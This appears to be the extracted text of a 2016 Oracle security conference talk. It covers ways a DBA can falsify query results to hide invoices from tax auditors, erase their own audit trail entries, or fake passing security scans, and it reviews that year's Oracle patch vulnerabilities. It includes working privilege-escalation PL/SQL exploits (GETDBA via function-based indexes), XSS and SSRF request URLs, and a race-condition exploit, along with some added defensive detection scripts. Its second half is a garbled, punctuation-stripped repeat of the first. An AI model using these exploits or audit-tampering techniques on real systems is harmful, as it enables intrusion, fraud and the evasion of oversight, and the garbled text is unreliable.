PUBLIC                         DBA                            NO  YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary..."
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, ...) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.
A lot of different wishes...
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate the SQL statement.
Select value ...
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, ...
The DBA can decide what will be returned.
Select value ...
A typical query from security checklists / scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks...
... from table/view ...
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail). All entries of the OS user DBA1 will be removed from the view. If a SIEM solution retrieves the audit data, the entries from DBA1 are not retrieved.
create or change synonyms to "redirect" objects
replace a table with a view + instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("The Catastrophe in the Database", Gunther Pipperr)
... where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name = 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows to replace an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string, e.g. aksdjhiuz, to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
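The countermeasures above as a runnable auditor self-check, added here as an example and not taken from the slides. It assumes an Oracle 12c data dictionary (REDACTION_POLICIES, DBA_POLICIES, DBA_SQL_TRANSLATIONS, DBA_VIEWS.TEXT_VC) with SELECT access to those views; the object names in steps 3 and 7 are a constructed sample.

```sql
-- Added example (not from the original slides): the "paranoid auditor"
-- countermeasures as a self-check script for Oracle 12c. All views are
-- standard data-dictionary views; the object names in steps 3 and 7 are a
-- constructed sample that an auditor replaces with the objects they query.

-- 1. Am I in the schema I think I am? CURRENT_SCHEMA should equal
--    SESSION_USER unless the auditor changed it on purpose.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;

-- 2. Does DUAL still resolve to the SYS table? Any synonym named DUAL that
--    points elsewhere (or to something that is not a table) is the
--    "view named DUAL" trick from the slides.
SELECT s.owner, s.synonym_name, s.table_owner, s.table_name,
       NVL(o.object_type, 'MISSING') AS resolves_to
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
         ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.synonym_name = 'DUAL'
   AND (s.table_owner <> 'SYS' OR s.table_name <> 'DUAL'
        OR NVL(o.object_type, 'MISSING') <> 'TABLE');

-- 3. Is it really a table? Objects a scanner queries by unqualified name
--    that exist in more than one schema, or as VIEW/SYNONYM, need a look.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name IN ('DUAL', 'DBA_AUDIT_TRAIL', 'HELP', 'PARAMETER')
 ORDER BY object_name, owner;

-- 4. Data Redaction policies: each one rewrites SELECT results
--    (e.g. FALSE -> TRUE) for the sessions matching EXPRESSION only.
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies;

-- 5. VPD policies: every enabled policy silently appends a WHERE clause.
--    EXEMPT ACCESS POLICY, as the slides suggest, bypasses them.
SELECT object_owner, object_name, policy_name, pf_owner, package, function
  FROM dba_policies
 WHERE enable = 'YES';

-- 6. SQL Translation Framework (12c): a profile may swap Query A for Query B.
--    Translations match the exact SQL text, which is why a random comment
--    (/* aksdjhiuz */) in the audit query defeats a registered one.
SELECT owner, profile_name, sql_text, translated_text, enabled
  FROM dba_sql_translations;

-- 7. Checksums of security-relevant views: keep the hash from the first
--    audit and diff it on the next one. TEXT_VC holds the first 4000
--    characters of the view text, enough to catch an added predicate.
SELECT owner, view_name, STANDARD_HASH(text_vc, 'SHA256') AS text_sha256
  FROM dba_views
 WHERE (owner, view_name) IN (('SYS', 'DBA_AUDIT_TRAIL'),
                              ('SYS', 'DBA_USERS'),
                              ('SYS', 'DBA_ROLE_PRIVS'))
 ORDER BY view_name;
```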
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors / Security Department should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU - CVE-2015-4925
SQL> GRANT EXECUTE ON Y TO PUBLIC;
SQL> CREATE TABLE RACER(Y NUMBER);
SQL> INSERT INTO RACER(Y) VALUES (1);
SQL> COMMIT;
SQL> create or replace procedure attempt_it is
  2  begin
  3    execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
  4  exception when others then
  5    null;
  6  end;
  7  /
SQL> declare
  2    i number := 0;
  3  begin
  4    for i in 1..1000 loop
  5      execute immediate 'alter table RACER.RACER rename column Y to Z';
  6      execute immediate 'alter table RACER.RACER rename column Z to Y';
  7    end loop;
  8  end;
  9  /

Jan 2016 CPU - CVE-2015-4925
SQL> DESC WMSYS.OWNED
PROCEDURE WMSYS.OWNED
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 P                              VARCHAR2                IN
February 2016
Nothing special happened
March 2016
Nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, they must also add:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Reporter: David Litchfield
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing (due to no execute privilege) function is within a SELECT query, the name of the function is not logged, but the name of the table in the query is.
Reporter: David Litchfield
Exploit: obvious, Create Java Source...
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists "apex".
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: Apex 5 is vulnerable to a server side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows to change database parameters without the admin privileges and a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')

Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  FALSE

-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.

-- as user SYS: re-run again after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later...)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, connected as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';
GRANTEE                        OWNER                          TABLE_NAME
------------------------------ ------------------------------ ------------------------------
SYSTEM                         SYS                            INCEXP
SYSTEM                         SYS                            INCFIL
SYSTEM                         SYS                            INCVID

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant select on sys.link$ to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.

SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;

-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
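A DBA-side detection for the preconditions of the function-based-index escalation shown for CVE-2016-3489 above and for CVE-2016-5604 (Cloud Control); this is an added example, not code from the slides. It assumes a 12c data dictionary (DBA_IND_EXPRESSIONS, DBA_TAB_PRIVS rows for INHERIT PRIVILEGES) and SQL*Plus for DBMS_OUTPUT; the name EXPLOIT_INDEX only refers to the pattern on the slides.

```sql
-- Added example (not from the original slides). Three checks a DBA can run
-- against the preconditions of the FBI escalation shown above:
--   (a) who may create an index on a table they do not own,
--   (b) whose invoker-rights code may still inherit SYS/SYSTEM privileges
--       on 12c (the ORA-06598 check that stopped the 12.1.0.2 attempt),
--   (c) which function-based indexes on SYS/SYSTEM tables call a function
--       owned by someone else (the EXPLOIT_INDEX pattern).

-- (a) CREATE ANY INDEX, or the object privilege INDEX on SYS/SYSTEM tables,
--     held by anyone other than the owner itself
SELECT grantee, privilege AS what, admin_option AS adm
  FROM dba_sys_privs
 WHERE privilege = 'CREATE ANY INDEX'
   AND grantee NOT IN ('SYS', 'DBA')
UNION ALL
SELECT grantee, 'INDEX ON ' || owner || '.' || table_name, grantable
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
 ORDER BY 1, 2;

-- (b) INHERIT PRIVILEGES on SYS/SYSTEM, or INHERIT ANY PRIVILEGES anywhere:
--     without one of these, a CURRENT_USER function created by a less
--     privileged user fails with ORA-06598 when SYS/SYSTEM invokes it
SELECT grantee, privilege AS what, table_name AS on_user
  FROM dba_tab_privs
 WHERE privilege = 'INHERIT PRIVILEGES'
   AND table_name IN ('SYS', 'SYSTEM')
UNION ALL
SELECT grantee, privilege, '*'
  FROM dba_sys_privs
 WHERE privilege = 'INHERIT ANY PRIVILEGES'
   AND grantee NOT IN ('SYS', 'DBA')
 ORDER BY 1, 2;

-- (c) Function-based indexes whose expression calls a function owned by
--     neither the table owner nor SYS. COLUMN_EXPRESSION is a LONG, so it
--     cannot be tested with LIKE in plain SQL; PL/SQL fetches it into a
--     VARCHAR2 and inspects it there.
SET SERVEROUTPUT ON
DECLARE
  v_expr VARCHAR2(32767);
  v_hits PLS_INTEGER := 0;
BEGIN
  FOR r IN (SELECT index_owner, index_name, table_owner, table_name,
                   column_expression
              FROM dba_ind_expressions
             WHERE table_owner IN ('SYS', 'SYSTEM')
                OR index_owner <> table_owner) LOOP
    v_expr := UPPER(r.column_expression);
    -- Oracle stores the expression with quoted identifiers, e.g.
    -- "SYSTEM"."GETDBA"('AK'); a schema-qualified call is what we look for.
    IF REGEXP_LIKE(v_expr, '"[A-Z0-9_$#]+"\."[A-Z0-9_$#]+"[[:space:]]*\(')
       AND v_expr NOT LIKE '%"' || r.table_owner || '".%'
       AND v_expr NOT LIKE '%"SYS".%' THEN
      v_hits := v_hits + 1;
      DBMS_OUTPUT.PUT_LINE('SUSPECT FBI ' || r.index_owner || '.' || r.index_name
        || ' ON ' || r.table_owner || '.' || r.table_name || ' : ' || v_expr);
    END IF;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE(v_hits || ' suspicious function-based index(es) found.');
END;
/
```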
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel/PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
